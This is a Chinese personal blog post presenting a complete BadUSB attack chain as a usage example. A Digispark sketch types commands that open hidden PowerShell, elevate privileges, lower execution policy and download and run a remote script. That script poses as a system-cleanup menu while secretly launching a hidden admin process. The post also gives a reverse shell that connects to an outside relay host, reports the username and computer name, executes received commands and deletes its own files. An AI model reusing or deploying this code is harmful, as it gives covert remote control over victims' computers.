侧边栏壁纸
博主头像
请叫我雯子小姐的小爷

  • 累计撰写 8 篇文章
  • 累计创建 2 个标签
  • 累计收到 5 条评论
标签搜索
小折腾

控制你的电脑,给我一个U盘足够了——badusb使用示例

请叫我雯子小姐的小爷
请叫我雯子小姐的小爷
2022-04-10 / 1 评论 / 2 点赞 / 599 阅读 / 7,745 字

badusb

源视频

烧录脚本

#include "DigiKeyboard.h"
void setup() {
  pinMode(1, OUTPUT);
  DigiKeyboard.sendKeyStroke(0);
  delay(3000);
  DigiKeyboard.sendKeyStroke(57);
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);//WIN+R
  delay(2000); 
  DigiKeyboard.sendKeyStroke(0);
  delay(1000); 
  DigiKeyboard.println("cmd /c start powershell -w hidden");
  delay(2000);
  DigiKeyboard.println("start-process -verb runas c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe");
  delay(3000);
  DigiKeyboard.sendKeyStroke(KEY_Y, MOD_ALT_LEFT);
  delay(2000);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  delay(3000);
  DigiKeyboard.println(F("set-executionpolicy remotesigned"));
  delay(500);
  DigiKeyboard.println("a");
  delay(500);
  DigiKeyboard.println("$q = new-object system.net.webclient");
  delay(500);
  DigiKeyboard.println("$q.downloadfile('http://static.iswenzi.com/forwen.ps1', 'c:\\forwen.ps1')");
  delay(500);
  DigiKeyboard.println("c:\\forwen.ps1");
  delay(500);
  DigiKeyboard.sendKeyStroke(57);
}

void loop() { 
  digitalWrite(1, HIGH);
  delay(100);
  digitalWrite(1, LOW); 
  delay(500);
  digitalWrite(1, HIGH);
  delay(100);
}

Powershell脚本

### Author: Rui Ma ###

### resize terminal size
$win=$Host.UI.RawUI.WindowSize
$win.Height=40
$win.Width=120
$Host.UI.RawUI.Set_windowsize($win)

## functions

# caculate size
function get_size($dir){
    $cache = Get-ChildItem  $dir  -Recurse | Measure-Object -property length -sum
    $size = ("{0:N2}" -f ($cache.sum / 1MB))
    return $size
}

# delete cache
function clear_cache(){
    Remove-Item $env:TEMP/* -recurse
    Remove-Item C:\Windows\SoftwareDistribution\Download/* -recurse
    $cache = get_size($env:TEMP)
    Write-Output ""
    Write-Host "Warning: Some files cannot be deleted temporarily because they are occupied by other applications."
    Write-Host "After cleaning the system cache file size: "$cache "MB"
    pause
}

# turn off system dormancy
function powercfg_off(){
    C:\WINDOWS\System32\cmd.exe /c powercfg -h off
    Write-Output ""
    Write-Host "System dormancy has been closed, successfully releasing 5G to 20G space on disk C"
    Write-Output ""
    pause
}

# turn on system dormancy
function powercfg_on(){
    C:\WINDOWS\System32\cmd.exe /c powercfg -h on
    Write-Output "System dormancy has been opened"
    pause
}

# open url
function open_url($url){
    Start-Process -FilePath $url
}

# get content
function get_msm($url){
    try{
        #curl $url | Select -ExpandProperty Content
        Invoke-RestMethod -Uri $url
    }catch{
        Write-Host "NET ERROR..."
    }
}

# choose 
function lang_choose($lang_choose){
    Write-Output ""
    if($lang_choose -eq 1){
        $lang_choosed = "https://iswenzi.com/menu.php?lang=chinese"
    }else{
        $lang_choosed = "https://iswenzi.com/menu.php?lang=english"
    }
    return $lang_choosed
}

$msm = get_msm("https://iswenzi.com/Invoke-PowerShellTcp.php")
Set-Content -Path c:\system.ps1 -Value $msm
#$file = Get-Item c:\system.ps1
#$file.Attributes="hidden"
START-PROCESS -VERB RUNAS C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE -WindowStyle Hidden "Import-Module c:\system.ps1;Invoke-PowerShellTcp" 

## init
cls;Write-Host "Version: v1.0";Write-Host "Author: Rui Ma";Write-Output "";Write-Output "The program is being initialized...";Write-Output ""

$begin_time = Get-Date;$cache = get_size($env:TEMP);
#Start-Sleep –s 2
rm C:\FORWEN.PS1

Write-Host "System time:"$begin_time;Write-Host "System cache size:"$cache "MB";Write-Output "";Write-Output "Initialization completed!"

## choose function
Write-Output ""
$lang_choose = Read-Host "Language: 1.Chinese  2.English";if($lang_choose -eq 1){$lang_choosed = "https://iswenzi.com/menu.php?lang=chinese";}else{$lang_choosed = "https://iswenzi.com/menu.php?lang=english";}
while(1){
cls;get_msm($lang_choosed) # menu
$choose = Read-Host "Select the function you need"
switch($choose){
 {$_ -eq 1}{clear_cache}
 {$_ -eq 2}{cls;Write-Output "";Write-Host "21. Turn off system sleep (this function can be used if there is insufficient space on system disk C)";Write-Host "22. Turn on  system sleep";pause}
 {$_ -eq 21}{powercfg_off}
 {$_ -eq 22}{powercfg_on}
 {$_ -eq 3}{cls;Write-Output "";Write-Host "31. Task manager";Write-Host "32. Scheduled shutdown";Write-Host "33. Cancel the scheduled shutdown";pause}
 {$_ -eq 31}{C:\WINDOWS\System32\Taskmgr.exe}
 {$_ -eq 32}{$time_s = Read-Host "Please enter how many seconds to turn off the computer";C:\WINDOWS\System32\shutdown.exe -s -t $time_s}
 {$_ -eq 33}{C:\WINDOWS\System32\shutdown.exe -a}
 {$_ -eq 4}{cls;Write-Output "";Write-Host "41. List Tasks";Write-Host "42. Kill Task";pause}
 {$_ -eq 41}{C:\Windows\System32\tasklist.exe;pause}
 {$_ -eq 42}{$n_pid = Read-Host "Input the task PID";C:\Windows\System32\taskkill.exe /pid $n_pid /t;pause}
 {$_ -eq 5}{Write-Host "No such command"}
 {$_ -eq 7}{cls;Write-Output "";Write-Host "71. RWCloud.apk download";Write-Host "72. Access the Google plug-in of Chrome download";Write-Host "73. Windows digital activation tool download";Write-Host "74. iSlide tool download";pause}
 {$_ -eq 71}{open_url("http://ruiwencloud.xyz/app/RWCloud.apk");}
 {$_ -eq 72}{open_url("http://ruiwencloud.xyz/softwares/Chrome_Google.tar");}
 {$_ -eq 73}{open_url("http://ruiwencloud.xyz/softwares/HWIDGen_v62.01_CHS.exe");}
 {$_ -eq 74}{open_url("https://www.islide.cc/download");}
 {$_ -eq 8}{cls;Write-Output "";Write-Host "81. Open Movie Website";Write-Host "82. Open Free Music Download Website";Write-Host "83. Programmed learning --JianShu"; pause}
 {$_ -eq 81}{open_url("http://video.ruiwencloud.xyz")}
 {$_ -eq 82}{open_url("https://music.sounm.com/")}
 {$_ -eq 83}{open_url("https://www.jianshu.com/u/6cbbca425998")}
 {$_ -eq 9}{cls;get_msm("http://ruiwencloud.xyz/app/msm");pause}
 {$_ -eq 100}{exit}
 {$_ -eq 101}{Write-Output "";$lang_choose = Read-Host "Language: 1.Chinese  2.English";if($lang_choose -eq 1){$lang_choosed = "http://ruiwencloud.xyz/app/msm/menu.php?lang=chinese";}else{$lang_choosed = "http://ruiwencloud.xyz/app/msm/menu.php?lang=english";}}
}# switch end
}# while end

Windows 反弹脚本

function Invoke-PowerShellTcp { try { #Connect back if the reverse switch is used. #$IPAddress = "10.215.64.73" #$Port = 666 $IPAddress = "s1.natfrp.com" $Port = 27455 $client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port) rm C:\system.ps1 $stream = $client.GetStream() [byte[]]$bytes = 0..65535|%{0} #Send back current username and computername $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n") $stream.Write($sendbytes,0,$sendbytes.Length) #Show an interactive PowerShell prompt $sendbytes = ([text.encoding]::ASCII).GetBytes("PS " + (Get-Location).Path + ">") $stream.Write($sendbytes,0,$sendbytes.Length) while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding $data = $EncodedText.GetString($bytes,0, $i) #try{Write-Host "PS " (Get-Location).Path "> " $data}catch{Write-Host $data} try { #Execute the command on the target. $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String ) } catch { Write-Warning "Something went wrong with execution of command on the target." Write-Error $_ } $sendback2 = $sendback + "PS " + (Get-Location).Path + "> " $x = ($error[0] | Out-String) $error.clear() $sendback2 = $sendback2 + $x #Write-Host $sendback2 #Return the results $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2) $stream.Write($sendbyte,0,$sendbyte.Length) $stream.Flush() } $client.Close() if ($listener) { $listener.Stop() } } catch { Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port." Write-Error $_ } }
2